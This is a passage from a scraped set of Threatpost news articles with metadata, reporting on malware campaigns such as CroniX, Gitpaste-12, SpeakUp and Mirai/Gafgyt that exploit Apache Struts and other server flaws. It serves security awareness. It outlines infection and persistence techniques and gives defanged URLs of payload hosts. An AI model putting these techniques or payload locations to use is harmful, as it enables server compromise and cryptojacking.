The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw that it downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX is also competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. 
\u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the two operations, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed to be registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. 
\u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-06T17:40:51", "description": "Researchers have uncovered a new worm targeting Linux based x86 servers, as well as Linux internet of things (IoT) devices (that are based on ARM and MIPS CPUs).\n\nOf note, the malware utilizes GitHub and Pastebin for housing malicious component code, and has at least 12 different attack modules available \u2013 leading researchers to call it \u201cGitpaste-12.\u201d It was first detected by Juniper Threat Labs in attacks on Oct. 
15, 2020.\n\n\u201cNo malware is good to have, but worms are particularly annoying,\u201d said researchers with Juniper Threat Labs [in a Thursday post](<https://blogs.juniper.net/en-us/threat-research/gitpaste-12>). \u201cTheir ability to [spread in an automated fashion](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>) can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization.\u201d\n\nThe first phase of the attack is the initial system compromise. The malware\u2019s various attack modules include 11 previously-disclosed vulnerabilities. That includes flaws in [Apache Struts (CVE-2017-5638),](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) Asus routers (CVE-2013-5948), Webadmin plugin for opendreambox (CVE-2017-14135) and [Tenda routers (CVE-2020-10987).](<https://threatpost.com/tenda-router-zero-days-spyware-botnet/159834/>)\n\nThe malware will attempt to use known exploits for these flaws to compromise systems and may also attempt to brute force passwords, said researchers. After compromising a system, a main shell script is then uploaded to the victim machine, and starts to download and execute other components of Gitpaste-12.\n\n## **The Malware **\n\nThis script sets up a cron job it downloads from Pastebin. A cron job is a time-based job scheduler in Unix-like computer operating systems. The cron job calls a script and executes it again each minute; researchers believe that this script is presumably one mechanism by which updates can be pushed to the botnet.\n\nIt then downloads a script from GitHub (https://raw[.]githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it. The script contains comments in the Chinese language and has multiple commands available to attackers to disable different security capabilities. 
These include stripping the system\u2019s defenses, including firewall rules, selinux (a security architecture for Linux systems), apparmor (a Linux kernel security module that allows the system administrator to restrict programs\u2019 capabilities), as well as common attack prevention and monitoring software.\n\nThe 11 vulnerabilities utilized for Gitpaste-12\u2019s initial attack vectors. Credit: Juniper Labs\n\nThe malware also has some commands that disable cloud security agents, \u201cwhich clearly indicates the threat actor intends to target public cloud computing infrastructure provided by Alibaba Cloud and Tencent,\u201d said researchers.\n\nGitpaste-12 also features commands allowing it to run a cryptominer that targets the Monero cryptocurrency.\n\n\u201cIt also prevents administrators from collecting information about running processes by intercepting \u2018readdir\u2019 system calls and skip directories for processes like tcpdump, sudo, openssl, etc. in \u2018/proc\u2019,\u201d said researchers. \u201cThe \u2018/proc\u2019 directory in Linux contains information about running processes. It is used, for example, by the \u2018ps\u2019 command to show information about running processes. But unfortunately for this threat actor, this implementation does not do what they expect it to do.\u201d\n\nFinally, the malware also contains a library (hide.so) that is loaded as LD_PRELOAD, which downloads and executes Pastebin files (https://pastebin[.]com/raw/Tg5FQHhf) that host further malicious code.\n\nResearchers said they reported the Pastebin URL, as well as the Git repo mentioned above that downloads malicious scripts for the malware. The Git repo was closed on Oct. 30, 2020. 
\u201cThis should stop the proliferation of this botnet,\u201d said researchers.\n\n## **Wormable Features**\n\nIn terms of its worming capabilities, Gitpaste-12 also contains a script that launches attacks against other machines, in an attempt to replicate and spread the malware.\n\n\u201cThe malware chooses a random /8 CIDR for attack and will try all addresses within that range,\u201d according to researchers. Classless Inter-Domain Routing (CIDR) is a method for allocating IP addresses and for IP routing \u2013 meaning that the attack targets all IP addresses within the random CIDR\u2019s range.\n\nAnother version of the script also opens ports 30004 and 30005 for reverse shell commands, said researchers. Port 30004 uses the Transmission Control Protocol (TCP), which is one of the main protocols in TCP/IP networks; while port 30005 is a bidirectional SOAP/HTTP-based protocol, which provides communication between devices like routers or network switches, and auto-configuration servers.\n\nWorms can have a widespread impact, [as seen in a 2019 campaign](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>) that exploited a vulnerability in the Exim mail transport agent (MTA) to gain remote command-execution on victims\u2019 Linux systems, using a wormable exploit. Researchers said that currently more than 3.5 million servers were at risk from the attacks.\n\nSeveral new worms have popped up in 2020 so far, [including the Golang worm](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>), which is aimed at installing cryptominers, and recently changed up its tactics to add attacks on Windows servers and a new pool of exploits to its bag of tricks.\n\nIn August,[ a cryptomining worm](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) from the group known as TeamTNT was found spreading through the Amazon Web Services (AWS) cloud and collecting credentials. 
Once the logins are harvested, the malware logs in and deploys the XMRig mining tool to mine Monero cryptocurrency.\n", "cvss3": {}, "published": "2020-11-06T17:34:00", "type": "threatpost", "title": "Gitpaste-12 Worm Targets Linux Servers, IoT Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5948", "CVE-2017-14135", "CVE-2017-5638", "CVE-2020-10987"], "modified": "2020-11-06T17:34:00", "id": "THREATPOST:7B2EAFA107D335014D553D78946C453E", "href": "https://threatpost.com/gitpaste-12-worm-linux-servers-iot-devices/161016/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as 
[CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library, popular with enterprise developers and companies for creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November.\n\nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week](<https://github.com/cellanu/cve-2019-0230>) raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expression that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java expression language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. 
Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch the DoS bug (CVE-2019-0233). That vulnerability lets an attacker override the access permissions of uploaded files and the directories that hold them, which leads to a DoS condition.\n\nAccording to the Apache Struts 2 Wiki description of the bug, the flaw can be triggered with a file upload to a Struts Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according to the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests that security teams verify no unauthorized modifications have occurred on the system before applying the patch, and that they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:27", "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching for and infecting other vulnerable machines. 
Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but has now spread to Windows and other servers.\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe malware also uses a set of older exploits to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201d; and CVE-2018-20062 for the ThinkPHP framework.\n\nExploits without CVEs are also used against Hadoop, Redis and MSSQL. In the latter two cases, the malware first mounts a dictionary/brute-force attack to find credentials and, if successful, uses a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. 
\u201cAs in other families of malware, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others because the functions imported from other libraries are statically compiled into the binary itself. Go also has a distinctive way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized for the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader payload, an update script, a cryptominer, a watchdog, a scanner and a configuration file for the cryptominer, Barracuda noted.\n\nOf these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file, meanwhile, is the malware\u2019s worm propagation mechanism. 
It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports the success back to the C2.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. An init/update script accomplishes the same thing on the Linux side, according to the analysis, by adding an authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Threatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n", "cvss3": {}, "published": "2020-06-25T18:30:59", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "modified": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-04T07:14:14", "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far, in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and it doesn\u2019t stop at Linux: It also has the ability to infect MacOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. 
And, he said, since this software can be deployed on virtual servers, cloud infrastructure is also exposed.\n\nThe trojan itself can affect all Linux distributions and MacOS.\n\n## Infection Routine\n\nThe initial infection vector targets a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques to upload a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nOnce the victim machine is registered with the C2, SpeakUp continuously asks for new tasks on a fixed interval of every three seconds, Check Point analysts found. The C2 can say \u201cno task\u201d \u2013 or, it can tell the backdoor to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt exploit further using new techniques. 
If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign could be scaled immediately as well, since the threat actor would be able to push a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords, and scanning the network environment of the infected machine. For the latter function, it checks for the availability of specific ports on servers that share the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux server products, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; an Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate.png>)\n\nSpeakUp\u2019s daily infection rate\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying 
the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. According to [XMRHunter](<https://www.xmrhunter.com/>), the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy a few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT.png>)\n\nSpeakUp has no detections in VirusTotal.\n\nThe initial victims have been in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. 
Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. \u201cNot only was this highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftsmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and Github projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of times in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers. 
_\n", "cvss3": {}, "published": "2019-02-04T14:00:15", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2016-3088", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-2894"], "modified": "2019-02-04T14:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:51:10", "description": "Researchers have discovered new variants of the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>) post.\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 
7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers exploit it by placing an OGNL expression in a specially crafted Content-Type, Content-Disposition or Content-Length HTTP header of a multipart request; the vulnerable multipart parser evaluates the expression, resulting in arbitrary command-execution.\n\nThough a patch has been available for over a year, many organizations have not updated their systems; that same already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) was responsible for the Equifax breach last summer, which impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>) (CVE-2018-11776), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August, one that was hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently 
hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) stems from a lack of validation of user-supplied parameters passed to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue on July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it fetches an update from <HTTP_SERVER>, saves it to <FILE_LOCATION>, and installs the update. 
After that, the botnet launches a BlackNurse DDoS attack, a method first documented in November 2016 that floods a target with ICMP Type 3 Code 3 (destination unreachable, port unreachable) packets to drive up CPU load on the firewalls that process them.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Nigam told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of the newly targeted vulnerabilities comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was also released publicly in Oct. 
2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "cvss3": {}, "published": "2018-09-10T14:23:09", "type": "threatpost", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"], "modified": "2018-09-10T14:23:09", "id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:40:45", "description": "Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nThe never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an \u201cexhaustive\u201d list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.\n\n\u201cLucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team, on [Wednesday in a blog 